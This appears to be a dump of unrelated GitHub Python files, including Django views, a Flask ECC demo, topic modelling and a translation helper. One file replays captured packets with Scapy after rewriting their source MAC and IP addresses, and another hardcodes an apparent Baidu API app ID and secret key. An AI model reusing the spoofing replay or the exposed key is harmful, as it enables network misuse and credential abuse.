x.sample(25))\ndf_revsample.shape\n#df_revsample.to_pickle(\"./data/df_LVsampled25Reviews\")\ndf_revsample.business_id.unique().shape # 3020 unique businesses\ndf_revsample.name.unique().shape #2163 business names (3020 - 2163 = 857 with multiple locations?)\n\n#---------Repeat for Tips df: ###\n\ndf_tips = pd.read_pickle(\"./data/df_LVtips.pkl\") #Loading pd dataframe with ALL LasVegas restaurants tips\ndf_tips.shape\nlist(df_tips)\ndf_tips = df_tips.filter(['business_id','name','tip'])\ndf_tips.business_id.unique().shape\ndf_tips.to_pickle(\"./data/df_LVtips.pkl\")\n\ntip_count = df_tips.groupby(by=\"business_id\").count()\ntip_count = tip_count[tip_count['name']>=5]\ntip_count.shape\n","repo_name":"dezzibelle/Yelp_Recommender","sub_path":"Members/Erin/SampleReviews.py","file_name":"SampleReviews.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30333480311","text":"from django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import filters, mixins, permissions, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\n\nfrom .filters import TagFilter, SearchIngredientFilter\nfrom .models import Ingredient, Recipe, Tag\nfrom .permissions import IsAuthenticatedForPostAndPatch\nfrom .serializers import (FavoriteSerializer, IngredientsSerializer,\n RecipesGetSerializer, RecipesPostSerializer,\n TagSerializer)\nfrom .utils import create_user_shopping_cart\n\n\nclass TagsViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet\n):\n \"\"\"Обработка тегов для рецептов\"\"\"\n queryset = Tag.objects.all()\n serializer_class = TagSerializer\n pagination_class = None\n filter_backends = (DjangoFilterBackend,)\n filterset_fields = ('slug', 'name')\n\n\nclass RecipesViewSet(viewsets.ModelViewSet):\n \"\"\"Создание и обработка рецептов\"\"\"\n queryset = Recipe.objects.select_related('author').all()\n filter_backends = (DjangoFilterBackend, filters.OrderingFilter)\n filterset_class = TagFilter\n permission_classes = (IsAuthenticatedForPostAndPatch,)\n ordering = ('-pub_date',)\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return RecipesGetSerializer\n return RecipesPostSerializer\n\n def get_queryset(self):\n qs = Recipe.objects\n if self.request.query_params.get('is_favorited'):\n qs = qs.filter(favorite__username=self.request.user)\n if self.request.query_params.get('is_in_shopping_cart'):\n qs = qs.filter(shopping_cart__username=self.request.user)\n return qs\n\n @action(\n methods=['post', 'delete'],\n detail=True,\n permission_classes=[permissions.IsAuthenticated]\n )\n def favorite(self, request, pk=None):\n \"\"\"Добавление рецептов в избранное\"\"\"\n recipe = get_object_or_404(Recipe, pk=pk)\n favorites = request.user.favorite_all.all()\n if request.method == 'POST':\n if recipe in favorites:\n return Response(\n 'Уже добавлено в избранное',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.favorite.add(request.user)\n serializer = FavoriteSerializer(recipe)\n return Response(serializer.data)\n if recipe not in favorites:\n return Response(\n 'Такого рецепта нет в избранном!',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.favorite.remove(request.user)\n return Response('Успешно удалено')\n\n @action(\n methods=['post', 'delete'],\n detail=True,\n permission_classes=[permissions.IsAuthenticated]\n )\n def shopping_cart(self, request, pk=None):\n \"\"\"Добавление рецептов в список покупок\"\"\"\n recipe = get_object_or_404(Recipe, pk=pk)\n shopping_cart = request.user.shopping_cart_all.all()\n if request.method == 'POST':\n serializer = FavoriteSerializer(recipe)\n if recipe in shopping_cart:\n return Response(\n 'Уже добавлено в список покупок!',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.shopping_cart.add(request.user)\n return Response(serializer.data)\n if recipe not in shopping_cart:\n return Response('Такого рецепта нет в списке покупок!')\n recipe.shopping_cart.remove(request.user)\n return Response('Успешно удалено')\n\n @action(\n methods=['get'],\n detail=False,\n permission_classes=[permissions.IsAuthenticated]\n )\n def download_shopping_cart(self, request):\n \"\"\"Создание pdf.\"\"\"\n return create_user_shopping_cart(request)\n\n\nclass IngredientsViewSet(viewsets.ModelViewSet):\n \"\"\"Обработка ингредиентов\"\"\"\n queryset = Ingredient.objects.all()\n serializer_class = IngredientsSerializer\n filter_backends = (DjangoFilterBackend, SearchIngredientFilter)\n search_fields = ('^name', )\n pagination_class = None\n","repo_name":"StanislavRevolution/foodgram-project-react","sub_path":"backend/api_foodgram/recipes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41994985395","text":"class Solution:\n def leftRightDifference(self, nums: List[int]) -> List[int]:\n left = [0]\n left_sum = 0\n right = [0]\n right_sum = 0\n arr = []\n for i in range(len(nums)-1):\n left_sum = left_sum + nums[i] \n left.append(left_sum)\n for j in range(len(nums)-1,0,-1):\n right_sum = right_sum + nums[j]\n right.append(right_sum)\n right = right[::-1]\n for k in range(len(nums)):\n arr.append(abs(left[k]-right[k]))\n return arr\n\n","repo_name":"Cherry-theCSStudent/Leetcode-Solutions","sub_path":"leftRightSumDiff.py","file_name":"leftRightSumDiff.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35921691692","text":"# sorting using custom key\r\nemployees = [\r\n {'Name': 'Smit', 'age': 25, 'salary': 10000},\r\n {'Name': 'Tim', 'age': 30, 'salary': 80000},\r\n {'Name': 'Sarah', 'age': 18, 'salary': 10500},\r\n {'Name': 'Mike', 'age': 40, 'salary': 15000},\r\n{'Name': 'Apex', 'age': 25, 'salary': 10600},\r\n {'Name': 'Xie', 'age': 30, 'salary': 8020},\r\n {'Name': 'Lamburt', 'age': 18, 'salary': 11000},\r\n {'Name': 'Megha', 'age': 40, 'salary': 1500},\r\n{'Name': 'Musk', 'age': 25, 'salary': 10000},\r\n {'Name': 'Shady', 'age': 30, 'salary': 98000},\r\n {'Name': 'Mosh', 'age': 18, 'salary': 10500},\r\n {'Name': 'Mithali', 'age': 40, 'salary': 715000},\r\n{'Name': ' Turing', 'age': 25, 'salary': 107000},\r\n {'Name': ' Lin', 'age': 30, 'salary': 8000},\r\n {'Name': ' Hopkins', 'age': 18, 'salary': 91000},\r\n {'Name': 'Nikhil', 'age': 40, 'salary': 815000},\r\n{'Name': 'Alan', 'age': 25, 'salary': 10000},\r\n {'Name': 'Sharon', 'age': 30, 'salary': 88000},\r\n {'Name': 'John', 'age': 18, 'salary': 10200},\r\n {'Name': 'Devanshu', 'age': 40, 'salary': 315000},\r\n\r\n]\r\n\r\n# sort by name (Ascending order)\r\nemployees.sort(key=lambda x: x.get('Name'))\r\nprint(employees, end='\\n\\n')\r\n\r\n# sort by Age (Ascending order)\r\nemployees.sort(key=lambda x: x.get('age'))\r\nprint(employees, end='\\n\\n')\r\n\r\n# sort by salary (Descending order)\r\nemployees.sort(key=lambda x: x.get('salary'), reverse=True)\r\nprint(employees, end='\\n\\n')","repo_name":"smit-ux/Employee-Information-By-Sorting","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"hi","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30421830784","text":"\"\"\"\ndatabase_setup.py\n\nThis file contains a script to set up a MySQL database for storing dictionary data.\nIt establishes a connection to the database and creates the necessary tables,\nincluding \"Themes\", \"Notes\", and \"Settings\", with their respective fields.\n\nThe script utilizes the PyMySQL library for connecting to the MySQL server.\n\nAfter establishing the connection, the code executes CREATE TABLE statements\nto create the required tables. It also inserts initial data into the \"Settings\" table.\n\nNote: Before running this script, make sure you have installed the PyMySQL library\nand configured the MySQL server with the appropriate credentials and database.\n\nPlease modify the connection parameters (host, user, password, port, and database)\naccording to your MySQL server configuration.\n\"\"\"\n\nimport pymysql\n\n\ntry:\n connection = pymysql.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n port=3306,\n database=\"dictionary_db\",\n cursorclass=pymysql.cursors.DictCursor,\n )\n\n try:\n with connection.cursor() as cursor:\n create_table_themes = (\n \"CREATE TABLE Themes (\"\n \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n \"theme VARCHAR(50) NOT NULL,\"\n \"PRIMARY KEY (id)\"\n \");\"\n )\n cursor.execute(create_table_themes)\n with connection.cursor() as cursor:\n create_table_notes = (\n \"CREATE TABLE Notes(\"\n \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n \"word VARCHAR(30) NOT NULL,\"\n \"translate VARCHAR(30) NOT NULL,\"\n \"themesid INT(11),\"\n \"PRIMARY KEY (id),\"\n \"FOREIGN KEY (themesid) REFERENCES Themes(id) \"\n \");\"\n )\n cursor.execute(create_table_notes)\n with connection.cursor() as cursor:\n create_table_save_settings = (\n \"CREATE TABLE Settings (\"\n \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n \"theme VARCHAR(50),\"\n \"verify BOOLEAN,\"\n \"repetition BOOLEAN,\"\n \"word BOOLEAN,\"\n \"translate BOOLEAN,\"\n \"randomly BOOLEAN,\"\n \"successively BOOLEAN,\"\n \"timer INT,\"\n \"PRIMARY KEY (id)\"\n \");\"\n )\n cursor.execute(create_table_save_settings)\n with connection.cursor() as cursor:\n main_save = (\n \"INSERT INTO Settings (\"\n \"theme, \"\n \"verify,\"\n \"repetition,\"\n \"word,\"\n \"translate,\"\n \"randomly,\"\n \"successively,\"\n \"timer)\"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n )\n values = (\"List of themes\", True, False, True, False, True, False, 5)\n cursor.execute(main_save, values)\n connection.commit()\n connection.commit()\n\n finally:\n connection.close()\n\nexcept pymysql.Error as error:\n print(f\"Error executing CREATE query: {error}\")\n","repo_name":"OleksandHrynchak/Dictionary","sub_path":"Database/MySQL/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15403751778","text":"import _winreg\nfrom scapy.all import *\nfrom scapy.utils import rdpcap\n\nsrc_mac = \"MAC_ADDR\"\ndst_mc = \"MAC_ADDR\"\ndst_ip = \"\"\nsrc_ip = \"\"\n\nframes = rdpcap(\"somepcapfile.pcap\")\nfor frame in fames:\n\ttry:\n\t\tframe[Ether].src = src_mac\n\t\tframe[Ether].dst = dst_ip\n\t\tif IP in frame:\n\t\t\tframe[IP].src =src_ip\n\t\t\tframe[IP].dst = dst_ip\n\t\tsendp(frame)\n\texcept Exception as e:\n\t\tprint(\"Error\", e)\n\nkeyName = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER)","repo_name":"paddypopeye/Python_Security","sub_path":"SecurityPy3/PlayWinreg.py","file_name":"PlayWinreg.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42621483698","text":"from subprocess import run, PIPE\nimport os\nimport pathlib\nfrom typing import List\n\nfrom . import dotfiles, osx\n\n\ncode = osx.App(\n command='code',\n osx_name = 'Visual Studio Code.app',\n config_path = osx.CONFIG_DIR / 'Code/User',\n)\n\ncode_insiders = osx.App(\n command = 'code-insiders',\n osx_name = 'Visual Studio Code - Insiders.app',\n config_path = osx.CONFIG_DIR / 'Code - Insiders/User',\n)\n\nVSCODE_DOTFILES_PATH = dotfiles.repo_path()/'.config/Code/User'\n\n\ndef installed_extensions() -> List[str]:\n proc = run(['code', '--list-extensions'], stdout=PIPE)\n return proc.stdout.decode('utf-8').strip().split('\\n')\n\n\ndef extensions_from_dotfiles() -> List[str]:\n with open(dotfiles.repo_path()/'.config/vscode-extensions') as file:\n return file.read().strip().split('\\n')\n\n\ndef install_extension(app: osx.App, extension: str) -> None:\n proc = run([app.command, '--install-extension', extension], stdout=PIPE)\n stdout = proc.stdout.decode('utf-8').strip().split('\\n')\n print('\\n'.join(stdout[1:]))\n\n\ndef install_extensions_from_dotfiles(app: osx.App) -> None:\n print(f'Installing extensions for {app.osx_name} from dotfiles...')\n for extension in extensions_from_dotfiles():\n install_extension(app, extension)\n","repo_name":"dtgoitia/dotfiles-utils","sub_path":"utils/vscode.py","file_name":"vscode.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38038337089","text":"# Import necessary modules\nimport base64\nimport sys\nimport ecc\nfrom flask import Flask, request\n\n\n# This function provides a user interface to select the ECC parameters.\ndef select_ecc_params():\n # The loop continues until the user inputs a valid option.\n while True:\n # Present options for the type of ECC parameters to use.\n print(\"\\nSelect the kind of ECC parameters to use:\")\n print(\"1. Optimized by GA\")\n print(\"2. Optimized by PSO\")\n print(\"3. secp256k1\")\n print(\"4. brainpoolP256r1\")\n print(\"5. Exit the simulation\")\n option = input(\"\\nEnter the option (1 to 5): \")\n if option in [\"1\", \"2\", \"3\", \"4\"]:\n # If a valid option is selected, it is returned for further use.\n return option\n elif option == \"5\":\n # If option 5 is selected, the program is terminated.\n sys.exit(\"Exiting the simulation.\")\n else:\n # If the input is not valid, the user is prompted to input again.\n print(\"Incorrect option. Please enter a number between 1 and 5.\")\n\n\n# Application Initialization\napp = Flask(__name__) # Create a new Flask application\nchosen_params = select_ecc_params() # Type of ECC parameters to be used chosen by the user\nparams = ecc.initialize_params(chosen_params) # Initialize ECC parameters by calling select_ecc_params function that allows the user to choose the ECC parameters they want to use.\nprivate_key = ecc.generate_private_key(params) # Generate the private key for the elliptic curve cryptography\npublic_key = ecc.generate_public_key(private_key, params) # Generate the corresponding public key\nprivate_key_ecdh_B = ecc.generate_private_key(params) # Generate a private key for ECDH (Elliptic-curve Diffie-Hellman) protocol in Entity B Server (simulated ERP), used for secure key exchange\npublic_key_ecdh_B = ecc.generate_public_key(private_key_ecdh_B, params) # Generate the corresponding public key for ECDH (Elliptic-curve Diffie-Hellman) protocol in Entity B, used for secure key exchange\nhmac_key = None # Initialize HMAC (Hash-based Message Authentication Code) key to None\nmessage_counter = 0 # Initialize the counter for the received messages\n\n\n# Route handlers\n\n# This route handles POST requests sent to the '/order' endpoint\n@app.route('/order', methods=['POST'])\ndef decrypt_endpoint():\n global message_counter, hmac_key # Declare global variables to update them within this function\n\n # Extract the JSON data from the incoming HTTP POST request from Entity A (emulated e-commerce)\n data = request.get_json()\n\n # Decrypt the message and verify the HMAC\n is_hmac_valid, decrypted_message = decrypt_order_message(data)\n\n # If HMAC verification fails, return an error message to the sender Entity A (emulated e-commerce)\n if not is_hmac_valid:\n return {\"status\": \"error\", \"message\": \"HMAC verification failed\"}\n\n # If HMAC verification succeeds, increment the message counter and print the transaction details\n message_counter += 1\n print(f\"\\n\\nTransaction {message_counter}:\")\n print(f\"Encrypted message: {data['encrypted_message']}\")\n\n if decrypted_message is None:\n print(\"Decryption failed.\")\n else:\n print(f\"Decrypted message: {decrypted_message}\")\n\n # Return a success status response to the sender Entity A (emulated e-commerce)\n return {'status': 'success'}\n\n# This route handles GET requests sent to the '/public-key' endpoint and returns the public key to Entity A (emulated e-commerce)\n@app.route('/public-key', methods=['GET'])\ndef public_key_endpoint():\n return {\"public_key\": {\"x\": public_key.x, \"y\": public_key.y}}\n\n# This route handles GET requests sent to the '/public-key-ecdh' endpoint and returns the ECDH public key\n@app.route('/public-key-ecdh', methods=['GET'])\ndef public_key_ecdh_endpoint():\n return {\"public_key_ecdh\": {\"x\": public_key_ecdh_B.x, \"y\": public_key_ecdh_B.y}}\n\n# This route handles GET requests sent to the '/get-params' endpoint and returns the selected option for ECC parameters.\n # 1. Optimized by GA\n # 2. Optimized by PSO\n # 3. secp256k1\n # 4. brainpoolP256r1\n@app.route('/get-params', methods=['GET'])\ndef get_params_endpoint():\n return {\"params\": chosen_params}\n\n# Helper Functions\ndef decrypt_order_message(data):\n \"\"\"\n This function handles the decryption of the order message and the validation of its HMAC.\n Args:\n data (dict): The incoming order data that contains the encrypted message from Entity A (emulated e-commerce), HMAC, and keys.\n Returns:\n is_hmac_valid (bool): A flag indicating whether the HMAC validation was successful.\n decrypted_message (str): The decrypted message content.\n \"\"\"\n\n global hmac_key # Define hmac_key as global so it can be accessed outside this function\n\n # Extract the first part of the encrypted message from the incoming data and convert it to an ECPoint\n C1_data = data['C1']\n C1 = ecc.ECPoint(int(C1_data['x']), int(C1_data['y']))\n\n # Extract the encrypted message from the incoming data\n encrypted_message = data['encrypted_message']\n\n # Extract and decode the HMAC from the incoming data\n received_hmac = base64.b64decode(data['hmac'])\n\n # Decrypt the message using our ECC private key and the first part of the encrypted message\n try:\n decrypted_message = ecc.decrypt_message(C1, encrypted_message, private_key, params)\n except Exception as e:\n print(f\"An error occurred during decryption: {str(e)}\")\n decrypted_message = None\n\n\n # Extract Entity A's ECDH public key from the incoming data (emulated e-commerce) and convert it to an ECPoint\n public_key_ecdh_A = ecc.ECPoint(data['public_key_ecdh_A']['x'], data['public_key_ecdh_A']['y'])\n\n # Compute the shared secret by performing scalar multiplication between Entity A's ECDH public key and Entity B's ECDH private key\n shared_secret = ecc.ec_scalar_multiplication(public_key_ecdh_A, private_key_ecdh_B, params)\n\n # Convert the x-coordinate of the shared secret to bytes and use it as the HMAC key\n hmac_key = str(shared_secret.x).encode('utf-8')\n\n # Verify the received HMAC using the computed HMAC key, decrypted message and the received HMAC\n is_hmac_valid = ecc.verify_hmac(hmac_key, decrypted_message, received_hmac)\n\n # Print a success message if the HMAC verification is valid, otherwise print a failure message\n if is_hmac_valid:\n print(\"HMAC verification succeeded.\")\n else:\n print(\"HMAC verification failed.\")\n \n # Return the results of the HMAC verification and the decrypted message\n return is_hmac_valid, decrypted_message\n\n\n\n# Run the server\nif __name__ == \"__main__\":\n app.run(host='localhost', port=5000)\n","repo_name":"cftellezc/GA_PSO_ECC_parameter_Optimization","sub_path":"e-commerce_simulation/entityB.py","file_name":"entityB.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36933252745","text":"import cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.feature import greycomatrix, greycoprops\r\nimport sys\r\nfrom skimage import io\r\nimport pandas as pd\r\nimport glob\r\nfrom openpyxl import load_workbook\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom PIL import Image \r\nimport os\r\n\r\n\r\ndef DataImage():\r\n base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)))\r\n files_dir = os.path.abspath(os.path.join(base_dir, '../file_name.jpg'))\r\n image = plt.imread(files_dir)\r\n return(image)\r\n\r\ndef DataExcel():\r\n base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)))\r\n files_dir = os.path.abspath(os.path.join(base_dir, '../data.xlsx'))\r\n\r\n dataset = pd.read_excel (files_dir)\r\n fitur = dataset.iloc[:, :6].values\r\n kelas = dataset.iloc[:, 6].values\r\n \r\n data = {\r\n 'dataset' : dataset,\r\n 'fitur' : fitur,\r\n 'kelas' : kelas,\r\n }\r\n\r\n return(data)\r\n\r\ndef Crop (image):\r\n new_width = 700\r\n new_height = 700\r\n height, width, depth = image.shape # Get dimensions\r\n\r\n startx = width//2-(new_width//2)\r\n starty = height//2-(new_height//2) \r\n crop = image[starty:starty+new_height,startx:startx+new_width]\r\n return (crop)\r\n\r\ndef Rgb2Gray(crop):\r\n gray = crop[:,:,0]\r\n return(gray)\r\n\r\ndef Glcm(gray):\r\n glcm = greycomatrix(gray, [1], [0], symmetric = True, normed = True )\r\n contrast = greycoprops(glcm, 'contrast')\r\n dissimilarityraster = greycoprops(glcm, 'dissimilarity')\r\n homogeneityraster = greycoprops(glcm, 'homogeneity')\r\n energyraster = greycoprops(glcm, 'energy')\r\n correlationraster = greycoprops(glcm, 'correlation')\r\n ASMraster = greycoprops(glcm, 'ASM')\r\n\r\n glcm = {\r\n 'contrast' : contrast[0,0],\r\n 'dissimilarityraster' : dissimilarityraster[0,0],\r\n 'homogeneityraster' : homogeneityraster[0,0],\r\n 'energyraster' : energyraster[0,0],\r\n 'correlationraster' : correlationraster[0,0],\r\n 'ASMraster' : ASMraster[0,0],\r\n }\r\n\r\n return glcm\r\n\r\ndef Knn(data_train, data_test, kelas_train, k_value):\r\n classifier = KNeighborsClassifier(n_neighbors=k_value)\r\n classifier.fit(data_train, kelas_train)\r\n\r\n kelas_prediksi = classifier.predict(data_test)\r\n \r\n knn = kelas_prediksi\r\n\r\n return(knn)\r\n\r\ndef Run():\r\n # image = Data(\"grade1 (1).png\")\r\n\r\n image = DataImage()\r\n excel = DataExcel()\r\n\r\n crop = Crop(image)\r\n gray = Rgb2Gray(crop)\r\n glcm = Glcm(gray)\r\n \r\n data_train = [\r\n glcm['contrast'],\r\n glcm['dissimilarityraster'],\r\n glcm['homogeneityraster'],\r\n glcm['energyraster'],\r\n glcm['correlationraster'],\r\n glcm['ASMraster']\r\n ]\r\n data_train = [data_train]\r\n # print(excel['fitur'], data_train, excel['kelas'])\r\n # sys.exit()\r\n knn = Knn(excel['fitur'], data_train, excel['kelas'], 7)\r\n print(knn)\r\n\r\n return(knn)","repo_name":"luthfidhani/Klasifikasi-Daging-Sapi-PKL","sub_path":"Klasifikasi_daging_sapi - Backend/belajar_django/proses backup.py","file_name":"proses backup.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40067366360","text":"\n\"\"\"\nAssignment1: Code Part 4\nby Adelbert Choi\n\nThis script aims to implement topic modeling on the twitter data obtained\n\"\"\"\n\nimport math\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom numpy.random import seed\nfrom wordcloud import WordCloud\nfrom ggplot import *\n\nimport SentimentAnalysis as sa\nimport tweetProcessor as tp\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\ndef main():\n \"\"\"\n This method runs topic modelling through LDA.\n Note: code adapted from Lecturer Jeffrey Chan\n\n :return:\n \"\"\"\n # tweets json filename\n jsonFilename = \"uberTweetsUS.json\"\n\n # returns tweetTokens and tweetDates\n tweets = tp.getTweetDf(jsonFilename, type=\"topic\", removeFreqWords=True)\n\n\n featureNum = 250 # this is the number of features/words to used to describe our documents\n wordNumToDisplay = 20 # number of words to display for each topic\n topicNum = 3 # number of topics to be created\n\n # Count Vectorizer\n tfVectorizer = CountVectorizer(max_df=0.95, min_df=10, max_features=featureNum, lowercase=False, stop_words=None)\n # Create a term document matrix\n tf = tfVectorizer.fit_transform(tweets[\"tweetTokens\"])\n\n # Extract the names of the features - words\n tfFeatureNames = tfVectorizer.get_feature_names()\n\n # Set seed to allow reproducibility of results\n seed(7777)\n # Implement topic modeling using LDA\n ldaModel = LatentDirichletAllocation(n_components=topicNum, max_iter=10, learning_method='online').fit(tf)\n\n # Print out topics\n display_topics(ldaModel, tfFeatureNames, wordNumToDisplay)\n\n\n ### The following set of codes were adapted from https://www.machinelearningplus.com/nlp/topic-modeling-python-sklearn-examples/\n # The codes below aims to assign a topic to each tweet based on the constructed topic model\n # also the overall topic distribution is also obtained\n\n # Obtain ldaModel output\n lda_output = ldaModel.transform(tf)\n\n topicNames = [\"Topic\" + str(i) for i in range(topicNum)] # topic names e.g., Topic 0, 1, ..\n tweetNames = [\"Tweet\" + str(i) for i in range(len(tweets[\"tweetTokens\"]))] # tweet names e.g., Tweet 0, 1, ..\n\n # Make a pandas dataframe\n # this dataframe has assigned probabilities that a certain tweet is topic, 0, 1, or 2\n tweets_and_topics = pd.DataFrame(np.round(lda_output, 2), columns=topicNames, index=tweetNames)\n\n # Get dominant topic for each tweet\n # Return topic for a certain tweet if probability to a certain topic is the highest\n tweet_dominant_topic = np.argmax(tweets_and_topics.values, axis=1)\n tweets_and_topics[\"dominant_topic\"] = tweet_dominant_topic\n\n # Print Overall Topic Distribution\n print(\"Topic Distribution\")\n df_topic_distribution = tweets_and_topics[\"dominant_topic\"].value_counts().reset_index(name=\"Num Documents\")\n df_topic_distribution.columns = [\"Topic Number\", \"Number of Tweets\"]\n print(df_topic_distribution)\n\n # Display word cloud\n displayWordcloud(ldaModel, tfFeatureNames)\n\n # Apply sentiment analysis to each constructed topics\n # returns tweetTokens and tweetDates\n # do this again to obtain tweet tokens in a format ready for sentiment analysis\n tweets = tp.getTweetDf(jsonFilename, removeFreqWords=True)\n\n # get sentiments for each tweet\n vaderSentiments = sa.vaderSentimentAnalysis(tweets[\"tweetTokens\"], printSentiment=False)\n\n # preprate data for plotting\n tweet_df = pd.DataFrame({\"Sentiments\": vaderSentiments,\n \"Date\": tweets[\"tweetDates\"],\n \"DominantTopic\": tweet_dominant_topic})\n tweet_df[\"Sentiments\"] = tweet_df[\"Sentiments\"].apply(pd.to_numeric)\n\n # distribution of sentiments across Topics\n g = ggplot(aes(x='Sentiments'), data=tweet_df) + \\\n geom_histogram() + \\\n facet_wrap('DominantTopic', nrow=3) + \\\n labs(x=\"Sentiment Score\", y=\"Frequency\")\n print(g)\n\n\n\ndef display_topics(model, featureNames, numTopWords):\n \"\"\"\n Prints out the most associated words for each feature.\n Note: method obtained from Lecturer Jeffrey Chan\n\n @param model: lda model.\n @param featureNames: list of strings, representing the list of features/words.\n @param numTopWords: number of words to print per topic.\n \"\"\"\n\n # print out the topic distributions\n for topicId, lTopicDist in enumerate(model.components_):\n print(\"Topic %d:\" % (topicId))\n print(\" \".join([featureNames[i] for i in lTopicDist.argsort()[:-numTopWords - 1:-1]]))\n\n\ndef displayWordcloud(model, featureNames):\n \"\"\"\n Displays the word cloud of the topic distributions, stored in model.\n Note: method obtained from Lecturer Jeffrey Chan\n\n @param model: lda model.\n @param featureNames: list of strings, representing the list of features/words.\n \"\"\"\n\n # this normalises each row/topic to sum to one\n normalisedComponents = model.components_ / model.components_.sum(axis=1)[:, np.newaxis]\n\n topicNum = len(model.components_)\n # number of wordclouds for each row\n plotColNum = 2\n # number of wordclouds for each column\n plotRowNum = int(math.ceil(topicNum / plotColNum))\n\n # plot each wordlcloud\n for topicId, lTopicDist in enumerate(normalisedComponents):\n lWordProb = {featureNames[i] : wordProb for i, wordProb in enumerate(lTopicDist)}\n wordcloud = WordCloud(background_color='white')\n wordcloud.fit_words(frequencies=lWordProb)\n plt.subplot(plotRowNum, plotColNum, topicId+1)\n plt.title('Topic %d:' % (topicId))\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.show(block=True)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"adelbertchoi/social-media-analysis-twitter-data","sub_path":"topicModelling.py","file_name":"topicModelling.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73095768567","text":"import http.client\nimport hashlib\nimport urllib\nimport random\nimport json\nimport re\nimport toml\n\n\ndef translate(q, from_lang='auto', to_lang='zh'):\n app_id = '20200108000373970' # 填写你的appid\n secret_key = 'wovG1CuvOYi9DOYKJPgM' # 填写你的密钥\n\n httpClient = None\n myurl = '/api/trans/vip/translate'\n salt = random.randint(32768, 65536)\n sign = app_id + q + str(salt) + secret_key\n sign = hashlib.md5(sign.encode()).hexdigest()\n myurl = myurl + '?appid=' + app_id + '&q=' + urllib.parse.quote(\n q) + '&from=' + from_lang + '&to=' + to_lang + '&salt=' + str(\n salt) + '&sign=' + sign\n\n try:\n httpClient = http.client.HTTPConnection('api.fanyi.baidu.com')\n httpClient.request('GET', myurl)\n\n # response是HTTPResponse对象\n response = httpClient.getresponse()\n result_all = response.read().decode(\"utf-8\")\n result = json.loads(result_all)\n dst = result[\"trans_result\"][0][\"dst\"]\n return dst\n\n except Exception as e:\n print(e)\n\n finally:\n if httpClient:\n httpClient.close()\n\n\ndef delete_end_punc(str): # Delete punctuations at the end of sentences\n punctuation = ',。?!;:,.?!:;'\n return re.sub(re.compile(r'[{}]+$'.format(punctuation)), \"\", str)\n\n\ndef srt_trans_srt_by_one(input_file, from_lang, to_lang='zh', bi_sub=True):\n with open(input_file, 'r', encoding='utf-8') as f_in:\n output_file = input_file[:-4] + '_trans' + input_file[-4:]\n with open('Output/' + output_file, 'w', encoding='utf-8') as f_out:\n for line in f_in:\n pattern = re.compile('^\\d*$|\\d{2}:\\d{2}:\\d{2},\\d{3}')\n if re.match(pattern, line):\n f_out.write(line)\n else:\n line_trans = translate(line.strip(), from_lang, to_lang)\n print(line_trans)\n if bi_sub:\n f_out.write(line)\n f_out.write(line_trans + '\\n')\n\n\ndef srt_trans_srt(input_file, from_lang, to_lang='zh', bi_sub=True, from_lang_top=True):\n \"\"\"\n Translate the language in the input file into another language\n :param input_file: the srt file to be translated\n :param from_lang: the language of the input file\n :param to_lang: the language of the output file\n :param bi_sub: whether use bi-language subtitle\n :param from_lang_top: whether from_lang subtitles are higher than to_lang subtitles in the output file\n \"\"\"\n sub_list, format_list = [], []\n name = re.search(re.compile(r'\\w+(?=\\.)'), input_file).group()\n if bi_sub:\n if from_lang_top:\n output_file = '{}_{}_{}.srt'.format(name, from_lang, to_lang)\n else:\n output_file = '{}_{}_{}.srt'.format(name, to_lang, from_lang)\n else:\n output_file = '{}_{}.srt'.format(name, to_lang)\n\n with open(input_file, 'r', encoding='utf-8') as f_in:\n for line in f_in:\n if re.match(re.compile(r'^\\d+\\n$'), line):\n format_list.append(line)\n elif re.match(re.compile(r'^\\d{2}:\\d{2}:\\d{2},\\d{3}'), line):\n format_list[-1] += line\n elif line == '\\n':\n continue\n else:\n sub_list.append(line.strip())\n 